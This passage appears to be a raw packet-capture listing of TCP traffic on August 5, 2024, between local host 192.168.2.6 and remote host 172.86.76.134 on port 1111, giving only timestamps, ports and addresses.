                              Aug 5, 2024 14:40:49.607029915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607039928 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.607064009 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.607084990 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.607451916 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607462883 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607471943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607482910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607494116 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607503891 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607506990 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.607516050 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607526064 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607537031 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607537985 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.607547998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607559919 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607563972 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.607570887 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607582092 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607587099 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.607594967 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607629061 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.607652903 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.608141899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608151913 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608160973 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608175993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608186007 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608191967 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.608197927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608210087 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608218908 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.608222008 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608233929 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608243942 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608247995 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.608254910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608261108 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608263969 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.608272076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608282089 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608294010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608306885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608319998 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.608349085 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.608860016 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608870983 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608881950 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608891964 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608902931 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608912945 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608917952 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.608923912 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.608946085 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.609097004 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609107971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609139919 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.609245062 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609255075 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609260082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609265089 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609273911 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609293938 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609304905 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609308004 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.609314919 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609325886 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609333038 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.609338045 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609349012 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609361887 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609369040 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.609371901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609381914 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609392881 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609400988 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.609405041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.609437943 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.610166073 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610176086 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610186100 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610198975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610208988 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610212088 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.610220909 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610230923 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610234976 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.610241890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610253096 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610260963 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.610264063 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610275030 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610280037 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.610316038 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.610690117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610699892 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610709906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610719919 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610729933 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610735893 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.610743999 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610754967 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.610765934 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.610790014 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611071110 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611080885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611093998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611104965 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611119032 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611124992 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611130953 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611143112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611152887 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611172915 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611439943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611449957 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611459017 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611469030 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611479998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611484051 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611490011 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611500978 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611516953 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611536026 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611758947 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611793041 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611793041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611804962 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611834049 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611927032 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611937046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611946106 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611957073 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611967087 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.611970901 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.611989975 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.652268887 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.663203001 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.695713997 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.695794106 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.695828915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.695843935 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.695882082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.695916891 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.695930004 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.695950985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.695987940 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696000099 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696088076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696122885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696141005 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696156025 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696188927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696211100 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696242094 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696274042 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696307898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696295023 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696358919 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696361065 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696393967 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696427107 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696440935 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696460962 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696512938 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696517944 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696546078 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696578026 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696594954 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696614027 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696644068 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696651936 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696927071 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.696980953 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.696985006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697035074 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697067022 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697099924 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697112083 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.697134972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697154999 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.697168112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697201014 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697221994 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.697233915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697267056 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697285891 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.697299957 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697333097 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697346926 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.697365999 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697398901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697422981 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.697432041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697463989 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697479963 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.697496891 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697547913 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.697942972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.697976112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698016882 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.698024988 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698059082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698090076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698118925 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.698123932 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698157072 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698168039 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.698189020 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698223114 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698234081 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.698256016 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698283911 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.698288918 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698303938 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.698321104 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698352098 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698385954 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698402882 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.698419094 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698426008 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.698452950 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698486090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698513031 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.698518991 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.698580027 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699003935 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699038029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699069977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699084044 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699104071 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699146986 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699192047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699224949 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699256897 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699261904 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699290037 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699321985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699330091 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699354887 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699387074 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699402094 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699421883 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699455023 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699464083 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699487925 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699521065 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699533939 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699553967 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699585915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699608088 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699619055 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699651957 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699666977 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699915886 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699949980 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.699968100 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.699981928 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700015068 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700021982 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700047016 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700078964 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700093985 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700112104 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700145006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700155020 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700177908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700210094 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700218916 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700242996 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700275898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700285912 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700309992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700352907 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700447083 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700479031 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700531006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700537920 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700563908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700598001 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700603008 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700632095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700664997 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700679064 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700699091 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700742006 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700865984 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700898886 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700932026 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700941086 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.700963974 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.700998068 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.701004982 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.701031923 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.701073885 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.701529026 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.701562881 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.701596975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.701606035 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.701688051 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.701726913 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.701735973 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.701760054 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.701793909 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.701803923 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.746196985 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799134970 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799181938 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799241066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799293995 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799329042 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799354076 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799354076 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799380064 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799415112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799421072 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799448013 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799489021 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799499989 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799534082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799566984 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799573898 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799602985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799645901 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799726963 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799758911 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799791098 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799797058 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799823999 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799856901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799864054 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799890041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799922943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799927950 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.799956083 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799988985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.799998045 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.800021887 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800060034 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.800303936 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800335884 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800374031 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800375938 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.800405979 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800438881 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800448895 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.800472021 CEST111149721172.86.76.134192.168.2.6
